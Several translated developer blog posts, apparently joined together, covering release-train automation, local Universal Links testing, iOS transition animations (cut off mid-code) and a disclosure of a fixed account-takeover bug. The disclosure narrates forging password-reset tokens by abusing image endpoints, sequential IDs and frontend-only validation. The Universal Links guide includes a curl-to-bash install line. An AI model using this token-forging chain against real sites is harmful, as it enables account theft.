For advanced features, consider developing a Slack Bot for a more complete and customizable workflow and form usage.
Recap the effectiveness of automating the release of beta versions, the most significant benefit is moving the entire process to the cloud for execution, allowing the App Team to be hands-off and fully self-service.
The second common task for the App Team is packaging and submitting the official version of the app for review.
When the team is small and follows a single-line development approach, managing app version updates is not a big issue and can be done freely and regularly.
However, in larger teams with multiple concurrent development and iteration needs, the situation depicted above may arise. Without proper “interface communication” as mentioned earlier, everyone may work independently, leading to the App Team being overwhelmed. The cost of app updates is higher than web updates, the process is more complex, and frequent and disorderly updates can disrupt users.
The final issue is management. Without a fixed process or timeline, it’s challenging to optimize each step.
The solution is to introduce a Release Train into the development process, with the core concept of separating version updates from project development.
We establish a fixed schedule and define what will be done at each stage:
The actual timeline for QA and the release cycle (weekly, bi-weekly, monthly) can be adjusted according to each company’s situation. The key is to determine what needs to be done at specific times.
This is a survey on version release cycles conducted by foreign peers, with most opting for a bi-weekly release.
When it comes to weekly updates and our multiple teams, it will be as shown in the image above.
The Release Train, as the name suggests, is like a train station, and each version is a train.
If you miss it, you have to wait for the next one. Each Squad team and project choose their own time to board.
This is a great communication interface, as long as there is consensus and adherence to the rules, version updates can proceed smoothly.
For more technical details on Release Train, please refer to:
Once the process and schedule are determined, we can optimize what we do at each stage.
For example, packaging the official version manually is time-consuming. The entire process from packaging, uploading, to submission takes about 1 hour. During this time, work status needs to be constantly switched, making it difficult to do other tasks; this process is repeated for each packaging, wasting work efficiency.
Now that we have a fixed schedule, we directly integrate Google Calendar here. We add the tasks to be done at the expected schedule to the calendar. When the time comes, Google Apps Script will call Bitrise to execute the Fastlane script for packaging the official version and submission, completing all the work.
Using Google Calendar integration has another benefit. If there are unexpected situations that require postponement or advancement, you can directly go in and change the date.
To automatically execute Google Apps Script when the Google Calendar event time arrives, currently, you have to set up the service yourself. If you need a quick solution, you can use IFTTT as a bridge between Google Calendar <-> Bitrise/Google Apps Script. For the method, you can refer to this article.
p.s.
Here, more applications of Google App Scripts are mentioned. For details, please refer to: Forwarding Gmail emails to Slack using Google Apps Script.
The last one is using Github Action to enhance collaboration efficiency (PR Review).
Github Action is Github’s CI/CD service, which can be directly linked to Github events, triggered from open issues, open PRs, to merging PRs, and more.
Github Action can be used for any Git project hosted on Github. There are no restrictions for Public Repos, and Private Repos have a free quota of 2,000 minutes per month.
Here are two features:
Github Action still has many automation projects that can be done, and everyone can unleash their imagination.
Like the issue bot commonly seen in open-source projects:
Or automatically closing PRs that haven’t been merged for too long can also be done using Github Action.
Recapping the effectiveness of automating the packaging of the official version, simply use existing tools for integration; in addition to automation, also incorporate fixed processes to double work efficiency.
Apart from the manual packaging time, there is actually an additional cost in communicating version times, which is now directly reduced to 0; as long as you ensure to get on board within the schedule, you can focus all your time on “discussions” and “development”.
Calculating the effectiveness brought by these two automations, it can save 216 working hours per year.
Automating along with the communication interface mentioned earlier, let’s see how much efficiency can be improved by doing all these tasks together.
Apart from the tasks just done, we also need to evaluate the cost of switching flow. When we continue to work for a period of time, we enter a “flow” state, where our thoughts and productivity peak, providing the most effective output; but if we are interrupted by unnecessary things (e.g., redundant communication, repetitive work), to get back into the flow, it will take some time again, using 30 minutes as an example here.
The cost of switching flow due to unnecessary interruptions should also be included in the calculation, taking 30 minutes each time, occurring 10 times a month, 60 people will waste an additional 3,600 hours per year.
Flow switching cost (3,600) + unnecessary communication due to poor communication interface (1,200) + automation solving repetitive work (216) = a loss of 5,016 hours in a year.
The time saved from the previously wasted work hours can be invested in other more valuable tasks, so the actual productivity should increase by another X 200%.
Especially as the team continues to grow, the impact on work efficiency also magnifies.
Optimize early, enjoy early benefits; late optimization has no discount!!
Recapping the behind-the-scenes of an efficient working team, what have we mainly done.
No Code/Low Code First Prioritize choosing existing tool integrations (as in this example) if there are no existing tools available, then evaluate the cost of investing in automation and the actual income saved.
Everyone can be a problem-solving leader at Pinkoi
For solving problems, making changes; the vast majority require a lot of teamwork to make things better, which greatly needs the support and encouragement of company culture, otherwise, it will be very difficult to push forward alone.
At Pinkoi, everyone can be a problem-solving leader, you don’t have to be a Lead or PM to solve problems, many of the communication interfaces, tools, or automation projects introduced earlier were discovered by teammates, proposed solutions, and completed together.
About how team culture supports driving change, the four stages of problem-solving can all be linked to Pinkoi’s Core Values.
Step One: Grow Beyond Yesterday
Next is Build Partnerships
Step Three: Impact Beyond Your Role
Lastly, Dare to Fail!
The above is a sharing of the secrets of Pinkoi’s high-efficiency engineering team. Thank you all.
Join Pinkoi now >>> https://www.pinkoi.com/about/careers
For any questions and feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
iOS 13, iOS 14 What’s New with Universal Links & Setting Up a Local Testing Environment
Photo by NASA
For a service that has both a website and an app, the functionality of Universal Links is crucial for user experience, achieving seamless integration between the web and the app. However, it has always been set up simply without much emphasis. Recently, I spent some time researching and documenting some interesting things.
In services I have worked on, the consideration for implementing Universal Links is that the app does not have complete website functionality. Universal Links recognize the domain name, and as long as the domain name matches, the app will open. To address this issue, you can exclude URLs on the app that do not have corresponding functionality on the website. If the website service URLs are very specific, it may be better to create a new subdomain for Universal Links.
Regarding the update mechanism of Apple CDN, after checking the documentation, there is no mention of it. In a discussion, the official response was only “regular updates” with details to be released in the documentation… but I have not seen it yet.
I personally think it should be updated at least every 48 hours… so if you make changes to apple-app-site-association, it is recommended to update it online a few days before the app update is released.
1
+2
+
Headers: HOST=app-site-association.cdn-apple.com
+GET https://app-site-association.cdn-apple.com/a/v1/your-domain
+
You can see the current version on Apple CDN. (Remember to add Request Header Host=https://app-site-association.cdn-apple.com/
)
Due to the aforementioned CDN issue, how can we debug during the development phase?
Fortunately, Apple provides a solution for this part, otherwise it would be really frustrating not being able to update in real-time; we just need to add ?mode=developer
after applinks:domain.com
, and there are also managed (for enterprise internal APP)
or developer+managed
modes that can be set.
After adding mode=developer
, the app will fetch the latest app-site-association directly from the website every time you Build & Run on the simulator.
If you want to Build & Run on a real device, you need to go to “Settings” -> “Developer” -> enable the “Associated Domains Development” option.
⚠️ There is a pitfall here, app-site-association can be placed in the root directory of the website or in the
./.well-known
directory; but inmode=developer
, it will only look for./.well-known/app-site-association
, which made me think it wasn’t working.
If you are using iOS <14, remember that if you have made changes to app-site-association, you need to delete it and then Build & Run the app again to fetch the latest one. For iOS ≥ 14, please refer to the aforementioned method and add mode=developer
.
For better modification of the app-site-association content, you can modify the file on the server yourself. However, for those of us who sometimes cannot access the server side, testing universal links can be very troublesome. You have to constantly bother backend colleagues for help, and it becomes necessary to be very certain about the app-site-association content before going live, as constantly changing it can drive your colleagues crazy.
To solve the above problem, we can set up a small service locally.
First, install nginx on your Mac:
1
+
brew install nginx
+
If you haven’t installed brew yet, you can do so by running:
1
+
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
+
After installing nginx, go to /usr/local/etc/nginx/
and open the nginx.conf
file for editing:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+
...omitted
+server {
+ listen 8080;
+ server_name localhost;
+#charset koi8-r;
+#access_log logs/host.access.log main;
+location / {
+ root /Users/yourusername/Documents;
+ index index.html index.htm;
+ }
+...omitted
+
Around line 44, change the root
in the location /
to the directory you want (using Documents as an example here).
Listening on port 8080, no need to change if there are no conflicts.
Save the changes, then start nginx by running:
1
+
nginx
+
To stop it, run:
1
+
nginx -s stop
+
If you make changes to nginx.conf
, remember to run:
1
+
nginx -s reload
+
to restart the service.
Create a ./.well-known
directory inside the root
directory you just configured, and place the apple-app-site-association
file inside ./.well-known
.
⚠️ If
.well-known
disappears after creation, please note that on Mac, you need to enable “Show hidden files” feature:
In the terminal, run:
1
+
defaults write com.apple.finder AppleShowAllFiles TRUE
+
Then run killall finder
to restart all finders.
⚠️ The
apple-app-site-association
file may not have an extension, but it actually has the.json
extension:
Right-click on the file -> “Get Info” -> “Name & Extension” -> Check for the extension and uncheck “Hide extension” if necessary.
Once confirmed, open the browser to test if the following link can be downloaded successfully: apple-app-site-association at:
1
+
http://localhost:8080/.well-known/apple-app-site-association
+
If the download is successful, it means the local environment simulation is successful!
If you encounter a 404/403 error, please check if the root directory is correct, if the directory/file is placed correctly, and if the apple-app-site-association file accidentally includes the extension (
.json
).
Register & Download Ngrok
Extract the ngrok executable
Access the Dashboard page to execute Config settings
1
+
./ngrok authtoken YOUR_TOKEN
+
After setting up, run:
1
+
./ngrok http 8080
+
Because our nginx is on port 8080.
Start the service.
At this point, you will see a window showing the status of the service startup, and you can obtain the public URL assigned for this session from the Forwarding section.
⚠️ The assigned URL changes every time you start, so it can only be used for development testing purposes.
Here, we will use the assigned URL for this session
https://ec87f78bec0f.ngrok.io/
_as an example.
Return to the browser and enter https://ec87f78bec0f.ngrok.io/.well-known/apple-app-site-association
to see if you can successfully download and view the apple-app-site-association file. If everything is fine, you can proceed to the next step.
Enter the ngrok-assigned URL into the Associated Domains applinks: settings.
Remember to add ?mode=developer
for testing purposes.
Rebuild & Run the APP:
Open the browser and enter the corresponding Universal Links test URL (e.g., https://ec87f78bec0f.ngrok.io/buy/123
) to see the results.
If a 404 page appears, ignore it as we don’t actually have that page. We are testing if iOS matches the URL functionality as expected. If you see “Open” above, it means the match is successful. You can also test the reverse scenario.
Click “Open” to open the APP -> Test successful!
After testing OK in the development phase, confirming the modified apple-app-site-association file and handing it over to the backend for uploading to the server can ensure everything goes smoothly~
Finally, remember to change the Associated Domains applinks to the correct trial site URL.
Additionally, we can also check whether the apple-app-site-association file is requested each time the APP Build & Run is executed from the ngrok status window:
The configuration file is relatively simple, and only the following content can be set:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+
{
+ "applinks": {
+ "apps": [],
+ "details": [
+ {
+ "appID" : "TeamID.BundleID",
+ "paths": [
+ "NOT /help/",
+ "*"
+ ]
+ }
+ ]
+ }
+}
+
Replace TeamID.BundleId
with your project settings (ex: TeamID = ABCD
, BundleID = li.zhgchg.demoapp
=> ABCD.li.zhgchg.demoapp
).
If there are multiple appIDs, you need to add multiple sets.
The paths
section represents the matching rules, supporting the following syntax:
*
: Matches 0 to multiple characters, ex: /home/*
(home/alan…)?
: Matches 1 character, ex: 201?
(2010~2019)?*
: Matches 1 to multiple characters, ex: /?*
(/test, /home…)NOT
: Excludes in reverse, ex: NOT /help
(any URL but /help)You can decide on more combinations based on the actual situation, for more information, refer to the official documentation.
- Please note, it is not Regex and does not support any Regex syntax. - The old version does not support Query (?name=123) and Anchor (#title). - Chinese URLs must be converted to ASCII before being placed in paths (all URL characters must be ASCII).
The functionality of the configuration file has been enhanced, with added support for Query/Anchor, character sets, and encoding handling.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+
"applinks": {
+ "details": [
+ {
+ "appIDs": [ "TeamID.BundleID" ],
+ "components": [
+ {
+ "#": "no_universal_links",
+ "exclude": true,
+ "comment": "Matches any URL whose fragment equals no_universal_links and instructs the system not to open it as a universal link"
+ },
+ {
+ "/": "/buy/*",
+ "comment": "Matches any URL whose path starts with /buy/"
+ },
+ {
+ "/": "/help/website/*",
+ "exclude": true,
+ "comment": "Matches any URL whose path starts with /help/website/ and instructs the system not to open it as a universal link"
+ },
+ {
+ "/": "/help/*",
+ "?": { "articleNumber": "????" },
+ "comment": "Matches any URL whose path starts with /help/ and that has a query item with name 'articleNumber' and a value of exactly 4 characters"
+ }
+ ]
+ }
+ ]
+}
+
Copied content:
appIDs
is an array that can contain multiple appIDs, so you don’t have to repeat the entire block as before.
WWDC mentioned compatibility with the old version, when iOS ≥ 13 reads the new format, it will ignore the old paths.
The matching rules are now placed in components
; supporting 3 types:
/
: URL?
: Query, ex: ?name=123&place=tw#
: Anchor, ex: #titleThey can be used together. For example, if only /user/?id=100#detail
needs to jump to the app, it can be written as:
1
+2
+3
+4
+5
+
{
+ "/": "/user/*",
+ "?": { "id": "*" },
+ "#": "detail"
+}
+
The matching syntax remains the same as the original syntax, also supporting *
, ?
, ?*
.
Added comment
field for comments to help identification. (But please note that this is public and visible to others)
Reverse exclusion is now specified with exclude: true
.
Added caseSensitive
feature to specify whether the matching rules are case-sensitive, default: true
. This can reduce the number of rules needed if required.
Added percentEncoded
as mentioned earlier, in the old version, URLs needed to be converted to ASCII and placed in paths first (if it’s Chinese characters, it will look ugly and unrecognizable); this parameter specifies whether to automatically encode for us, default is true
. If it’s a Chinese URL, it can be directly included (ex: /customer service
).
For detailed official documentation, refer to this.
Default character sets:
This is one of the important features of this update, adding support for character sets.
System-defined character sets:
$(alpha)
: A-Z and a-z$(upper)
: A-Z$(lower)
: a-z$(alnum)
: A-Z, a-z, and 0–9$(digit)
: 0–9$(xdigit)
: Hexadecimal characters, 0–9 and a,b,c,d,e,f,A,B,C,D,E,F$(region)
: ISO region codes isoRegionCodes, Ex: TW$(lang)
: ISO language codes isoLanguageCodes, Ex: zhIf our URL has multiple languages and we want to support Universal links, we can set it up like this:
1
+2
+3
+
"components": [
+ { "/" : "/$(lang)-$(region)/$(food)/home" }
+]
+
This way, both /zh-TW/home
and /en-US/home
will be supported, making it very convenient without having to write a long list of rules!
Custom character sets:
In addition to the default character sets, we can also define custom character sets for increased configurability and readability.
Simply add substitutionVariables
in applinks
:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+
{
+ "applinks": {
+ "substitutionVariables": {
+ "food": [ "burrito", "pizza", "sushi", "samosa" ]
+ },
+ "details": [{
+ "appIDs": [ ... ],
+ "components": [
+ { "/" : "/$(food)/" }
+ ]
+ }]
+ }
+}
+
In this example, a custom food
character set is defined and used in subsequent components
.
The example can match /burrito
, /pizza
, /sushi
, /samosa
.
For more details, refer to this article in the official documentation.
If you don’t have any inspiration for the content of the configuration file, you can secretly refer to the content of other websites. Just add /app-site-association
or /.well-known/app-site-association
to the homepage URL of the service website to read their configuration.
For example: https://www.netflix.com/apple-app-site-association
In the case of using SceneDelegate
, the entry point for opening universal links is in the SceneDelegate:
1
+
func scene(_ scene: UIScene, continue userActivity: NSUserActivity)
+
Instead of in AppDelegate:
1
+
func application(_ application: UIApplication, continue userActivity: NSUserActivity, restorationHandler: @escaping ([UIUserActivityRestoring]?) -> Void) -> Bool
+
If you have any questions or suggestions, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Website security issues caused by multiple vulnerabilities combined
Photo by Tarik Haiga
A few years ago, while still supporting web development, I was assigned the task of organizing a CTF competition for the company’s internal engineering team. Initially, the idea was to have teams attack and defend each other’s products, but as the organizer, I wanted to first understand the level of expertise. So, I conducted penetration tests on various company products to see how many vulnerabilities I could find, ensuring the event would run smoothly.
However, due to limited competition time and significant differences between engineering teams, the final questions were based on common engineering knowledge and interesting topics. Those interested can refer to my previous article, “ How to Create an Interesting Engineering CTF Competition “, which contains many mind-blowing questions!
I found a total of four vulnerabilities across three products. Besides the issue discussed in this article, I also discovered the following common website vulnerabilities:
All vulnerabilities were found through black-box testing. Only the product with the XSS issue was one I had participated in developing; I had no prior knowledge of the others or their code.
As a white-hat hacker, I reported all discovered issues to the engineering team immediately, and they were fixed. It’s been two years now, and I think it’s time to disclose this. However, to respect my former company’s position, I won’t mention which product had this vulnerability. Just focus on the discovery process and reasons behind it!
This vulnerability allows an attacker to arbitrarily change the target user’s password, log in to the target user’s account with the new password, steal personal information, and perform illegal operations.
As the title suggests, this vulnerability was triggered by a combination of multiple factors, including:
Since user emails are public information on the platform, we first browse the platform to find the target account’s email. After knowing the email, go to the password reset page.
Both actions will send out password reset verification emails.
Go to your email to receive your password reset verification email.
The change password link has the following URL format:
1
+
https://zhgchg.li/resetPassword.php?auth=PvrrbQWBGDQ3LeSBByd
+
PvrrbQWBGDQ3LeSBByd
is the verification token for this password reset operation.
However, while observing the verification code image on the website, I noticed that the link format for the verification code image is also similar:
1
+
https://zhgchg.li/captchaImage.php?auth=6EqfSZLqDc
+
6EqfSZLqDc
shows 5136
.
What happens if we put our password reset token in? Who cares! Let’s try it!
Bingo!
But the captcha image is too small to get complete information.
Let’s keep looking for exploitable points…
The website, to prevent web scraping, displays users’ public profile email addresses as images. Keyword: images! images! images!
Let’s open it up and take a look:
Profile Page
Part of the Webpage Source Code
We also got a similar URL format result:
1
+
https://zhgchg.li/mailImage.php?mail=V3sDblZgDGdUOOBlBjpRblMTDGwMbwFmUT10bFN6DDlVbAVt
+
V3sDblZgDGdUOOBlBjpRblMTDGwMbwFmUT10bFN6DDlVbAVt
shows zhgchgli@gmail.com
Same thing, let’s stuff it in!
Bingo!🥳🥳🥳
PvrrbQWBGDQ3LeSBByd
=2395656
I thought, could it be a serial number…
So I entered the email again to request a password reset, decoded the new token from the received email, and got 2395657
… what the fxck… it really is.
Knowing it’s a serial number makes things easier, so the initial operation was to request a password reset email for my account first, then request it for the target to be hacked; because we can already predict the next password request ID.
Next, we just need to find a way to convert
2395657
back to a token!
The website only validates the email format on the frontend when editing data, without re-validating the format on the backend…
Bypassing the frontend validation, we change the email to the next target.
Fire in the hole!
We got:
1
+
https://zhgchg.li/mailImage.php?mail=UTVRZwZuDjMNPLZhBGI
+
Now, take this password reset token back to the password reset page:
Success! Bypassed verification to reset someone else’s password!
Finally, because there is no two-factor authentication or device binding feature; once the password is overwritten, you can log in directly and impersonate the user.
Let’s review the whole process.
The whole vulnerability discovery process surprised me because many issues were basic design problems; although the functionality seemed to work individually, and small holes seemed safe, combining multiple holes can create a big one. It’s really important to be cautious in development.
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Complete guide to pull-down to close, pull-up to appear, and full-page right swipe back effects in UIViewController
I’ve always been curious about how commonly used apps like Facebook, Line, Spotify, etc., implement effects such as “pull-down to close a presented UIViewController,” “pull-up to gradually appear a UIViewController,” and “full-page support for right swipe back.”
These effects are not built-in, and the pull-down to close feature only has system card style support starting from iOS 13.
Whether it’s due to not knowing the right keywords or the difficulty in finding the information, I could never find a clear implementation method for these features. The information I found was always vague and scattered, requiring piecing together from various sources.
When I first researched the method, I found the UIPresentationController
API. Without delving deeper into other resources, I used this method combined with UIPanGestureRecognizer
to achieve the pull-down to close effect in a rather crude way. It always felt off, like there should be a better way.
Recently, while working on a new project, I came across this article which broadened my horizons and revealed more elegant and flexible APIs.
This post serves as both a personal record and a guide for those who share my confusion.
The content is quite extensive. If you’re in a hurry, you can skip to the end for examples or directly download the GitHub project for study!
First, let’s talk about the latest built-in effect. From iOS 13 onwards, UIViewController.present(_:animated:completion:)
defaults to the modalPresentationStyle
effect of UIModalPresentationAutomatic
for card style presentation. If you want to maintain the previous full-page presentation, you need to specifically set it back to UIModalPresentationFullScreen
.
Built-in Calendar Add Effect
A better user experience should check for unsaved data when triggering the pull-down to close action, prompting the user whether to discard changes before leaving.
Apple has thought of this for us. Simply implement the methods in UIAdaptivePresentationControllerDelegate
.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+
import UIKit
+
+class DetailViewController: UIViewController {
+ private var onEdit: Bool = true;
+ override func viewDidLoad() {
+ super.viewDidLoad()
+
+ // Set delegate
+ self.presentationController?.delegate = self
+ // if UIViewController is embedded in NavigationController:
+ // self.navigationController?.presentationController?.delegate = self
+
+ // Disable pull-down to close method (1):
+ self.isModalInPresentation = true;
+
+ }
+
+}
+
+// Delegate implementation
+extension DetailViewController: UIAdaptivePresentationControllerDelegate {
+ // Disable pull-down to close method (2):
+ func presentationControllerShouldDismiss(_ presentationController: UIPresentationController) -> Bool {
+ return false;
+ }
+
+ // Triggered when pull-down to close is canceled
+ func presentationControllerDidAttemptToDismiss(_ presentationController: UIPresentationController) {
+ if (onEdit) {
+ let alert = UIAlertController(title: "Unsaved Data", message: nil, preferredStyle: .actionSheet)
+ alert.addAction(UIAlertAction(title: "Discard and Leave", style: .default) { _ in
+ self.dismiss(animated: true)
+ })
+ alert.addAction(UIAlertAction(title: "Continue Editing", style: .cancel, handler: nil))
+ self.present(alert, animated: true)
+ } else {
+ self.dismiss(animated: true, completion: nil)
+ }
+ }
+}
+
To cancel the dismissal by swipe down, you can either set the UIViewController
variable isModalInPresentation
to false or implement the UIAdaptivePresentationControllerDelegate
method presentationControllerShouldDismiss
and return true
.
The method UIAdaptivePresentationControllerDelegate presentationControllerDidAttemptToDismiss
is only called when the dismissal by swipe down is canceled.
For the system, a card-style presentation page is considered a Sheet
, which behaves differently from FullScreen
.
Assuming that
RootViewController
isHomeViewController
In a card-style presentation (UIModalPresentationAutomatic):
When
HomeViewController
Presents
DetailViewController
…
HomeViewController
viewWillDisAppear
/viewDidDisAppear
will not be triggered.
When
DetailViewController
Dismisses
…
HomeViewController
viewWillAppear
/viewDidAppear
will not be triggered.
⚠️ Since XCODE 11, iOS ≥ 13 apps packaged by default use the card style (UIModalPresentationAutomatic) for Presentations
If you previously placed some logic in viewWillAppear/viewWillDisappear/viewDidAppear/viewDidDisappear, be sure to check carefully! ⚠️
After looking at the built-in system, let’s get to the main point of this article! How to achieve these effects yourself?
First, let’s organize where you can perform window transition animations.
UITabBarController/UIViewController/UINavigationController
We can set the delegate
for UITabBarController
and implement the animationControllerForTransitionFrom
method to apply custom transition effects when switching UITabBarController
.
The system default has no animation. The above demonstration shows a fade-in fade-out transition effect.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+
import UIKit
+
+class MainTabBarViewController: UITabBarController {
+
+ override func viewDidLoad() {
+ super.viewDidLoad()
+ self.delegate = self
+
+ }
+
+}
+
+extension MainTabBarViewController: UITabBarControllerDelegate {
+ func tabBarController(_ tabBarController: UITabBarController, animationControllerForTransitionFrom fromVC: UIViewController, to toVC: UIViewController) -> UIViewControllerAnimatedTransitioning? {
+ //return UIViewControllerAnimatedTransitioning
+ }
+}
+
Naturally, when Presenting/Dismissing
a UIViewController
, you can specify the animation effect to apply; otherwise, this article wouldn’t exist XD. However, it’s worth mentioning that if you only want to create a Present animation without gesture control, you can directly use UIPresentationController
for convenience and speed (see references at the end of the article).
The system default is slide up to appear and slide down to disappear! If you customize it yourself, you can add effects such as fade-in, rounded corners, control of appearance position, etc.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+
import UIKit
+
+class HomeAddViewController: UIViewController {
+
+ override func viewDidLoad() {
+ super.viewDidLoad()
+
+ self.modalPresentationStyle = .custom
+ self.transitioningDelegate = self
+ }
+
+}
+
+extension HomeAddViewController: UIViewControllerTransitioningDelegate {
+
+ func animationController(forPresented presented: UIViewController, presenting: UIViewController, source: UIViewController) -> UIViewControllerAnimatedTransitioning? {
+ // Return nil to use the default animation
+ return //UIViewControllerAnimatedTransitioning Animation to apply when presenting
+ }
+
+ func animationController(forDismissed dismissed: UIViewController) -> UIViewControllerAnimatedTransitioning? {
+ // Return nil to use the default animation
+ return //UIViewControllerAnimatedTransitioning Animation to apply when dismissing
+ }
+}
+
Any
UIViewController
can implementtransitioningDelegate
to specifyPresent/Dismiss
animations;UITabBarViewController
,UINavigationController
,UITableViewController
, etc. can all do this.
UINavigationController
is probably the one that needs animation customization the least, because the system’s default left-slide to appear and right-slide to return animations are already the best effects. Customizing this part might be used to create seamless UIViewController
left-right switching effects.
Since we want to enable full-page gesture returns, we need to implement a custom POP animation effect.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+
import UIKit
+
+class HomeNavigationController: UINavigationController {
+
+ override func viewDidLoad() {
+ super.viewDidLoad()
+
+ self.delegate = self
+ }
+
+}
+
+extension HomeNavigationController: UINavigationControllerDelegate {
+ func navigationController(_ navigationController: UINavigationController, animationControllerFor operation: UINavigationController.Operation, from fromVC: UIViewController, to toVC: UIViewController) -> UIViewControllerAnimatedTransitioning? {
+
+ if operation == .pop {
+ return //UIViewControllerAnimatedTransitioning Animation to apply when returning
+ } else if operation == .push {
+ return //UIViewControllerAnimatedTransitioning Animation to apply when pushing
+ }
+
+ // Return nil to use the default animation
+ return nil
+ }
+}
+
Before discussing animation implementation and gesture control, let’s first talk about what interactive and non-interactive mean.
Interactive Animation: Gesture-triggered animations, such as UIPanGestureRecognizer
Non-interactive Animation: System-triggered animations, such as self.present( )
After discussing where animations can be applied, let’s look at how to create animation effects.
We need to implement the UIViewControllerAnimatedTransitioning
protocol and animate the view within it.
Directly use UIView.animate
for animation handling. At this point, UIViewControllerAnimatedTransitioning
needs to implement two methods: transitionDuration
to specify the duration of the animation, and animateTransition
to implement the animation content.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+
import UIKit
+
+class SlideFromLeftToRightTransition: NSObject, UIViewControllerAnimatedTransitioning {
+
+ func transitionDuration(using transitionContext: UIViewControllerContextTransitioning?) -> TimeInterval {
+ return 0.4
+ }
+
+ func animateTransition(using transitionContext: UIViewControllerContextTransitioning) {
+
+ // Available parameters:
+ // Get the view content of the target UIViewController to be displayed:
+ let toView = transitionContext.view(forKey: .to)
+ // Get the target UIViewController to be displayed:
+ let toViewController = transitionContext.viewController(forKey: .to)
+ // Get the initial frame information of the target UIViewController's view:
+ let toInitalFrame = transitionContext.initialFrame(for: toViewController!)
+ // Get the final frame information of the target UIViewController's view:
+ let toFinalFrame = transitionContext.finalFrame(for: toViewController!)
+
+ // Get the view content of the current UIViewController:
+ let fromView = transitionContext.view(forKey: .from)
+ // Get the current UIViewController:
+ let fromViewController = transitionContext.viewController(forKey: .from)
+ // Get the initial frame information of the current UIViewController's view:
+ let fromInitalFrame = transitionContext.initialFrame(for: fromViewController!)
+ // Get the final frame information of the current UIViewController's view: (can get the final frame from the previous display animation when closing the animation)
+ let fromFinalFrame = transitionContext.finalFrame(for: fromViewController!)
+
+ // toView.frame.origin.y = UIScreen.main.bounds.size.height
+
+ UIView.animate(withDuration: transitionDuration(using: transitionContext), delay: 0, options: [.curveLinear], animations: {
+ // toView.frame.origin.y = 0
+ }) { (_) in
+ if (!transitionContext.transitionWasCancelled) {
+ // Animation was not interrupted
+ }
+
+ // Notify the system that the animation is complete
+ transitionContext.completeTransition(!transitionContext.transitionWasCancelled)
+ }
+
+ }
+
+}
+
To and From:
Assume today
HomeViewController
needs toPresent/Push
DetailViewController
,
From = HomeViewController / To = DetailViewController
When
DetailViewController
needs toDismiss/Pop
,
From = DetailViewController / To = HomeViewController
⚠️⚠️⚠️⚠️⚠️
It is recommended by the official documentation to use the view from
transitionContext.view
rather than fromtransitionContext.viewController.view
.
However, there is an issue when performing Present/Dismiss animations with
modalPresentationStyle = .custom
;
Using
transitionContext.view(forKey: .from)
during Present will be nil, and
Using
transitionContext.view(forKey: .to)
during Dismiss will also be nil;
You still need to get the value from viewController.view.
⚠️⚠️⚠️⚠️⚠️
transitionContext.completeTransition(!transitionContext.transitionWasCancelled)
must be called when the animation is complete, otherwise the screen will freeze;
However, if
UIView.animate
has no executable animation, it will not callcompletion
, causing the aforementioned method not to be called; so make sure the animation will execute (e.g., y from 100 to 0).
ℹ️ℹ️ℹ️ℹ️ℹ️
For
ToView/FromView
involved in the animation, if the view is more complex or there are some issues during the animation; you can usesnapshotView(afterScreenUpdates:)
to take a screenshot for the animation display. First, take a screenshot and thentransitionContext.containerView.addSubview(snapShotView)
to the layer, then hide the originalToView/FromView (isHidden = true)
, and at the end of the animation,snapShotView.removeFromSuperview()
and restore the originalToView/FromView (isHidden = true)
.
You can also use the new animation class introduced in iOS ≥ 10 to implement animation effects. Choose based on personal preference or the level of detail required for the animation. Although the official recommendation is to use UIViewPropertyAnimator
for interactive animations, generally, both interactive and non-interactive (gesture control) animations can be done using UIView.animate; UIViewPropertyAnimator
allows for interruptible and continuable transition animations, though I’m not sure where it can be practically applied. Interested readers can refer to this article.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+
import UIKit
+
+class FadeInFadeOutTransition: NSObject, UIViewControllerAnimatedTransitioning {
+
+ private var animatorForCurrentTransition: UIViewImplicitlyAnimating?
+
+ func interruptibleAnimator(using transitionContext: UIViewControllerContextTransitioning) -> UIViewImplicitlyAnimating {
+
+ // Return the current transition animator if it exists
+ if let animatorForCurrentTransition = animatorForCurrentTransition {
+ return animatorForCurrentTransition
+ }
+
+ // Parameters as mentioned before
+
+ // fromView.frame.origin.y = 100
+
+ let animator = UIViewPropertyAnimator(duration: transitionDuration(using: transitionContext), curve: .linear)
+
+ animator.addAnimations {
+ // fromView.frame.origin.y = 0
+ }
+
+ animator.addCompletion { (position) in
+ transitionContext.completeTransition(!transitionContext.transitionWasCancelled)
+ }
+
+ // Hold onto the animator
+ self.animatorForCurrentTransition = animator
+ return animator
+ }
+
+ func transitionDuration(using transitionContext: UIViewControllerContextTransitioning?) -> TimeInterval {
+ return 0.4
+ }
+
+ func animateTransition(using transitionContext: UIViewControllerContextTransitioning) {
+ // For non-interactive transitions, use the interactive animator
+ let animator = self.interruptibleAnimator(using: transitionContext)
+ animator.startAnimation()
+ }
+
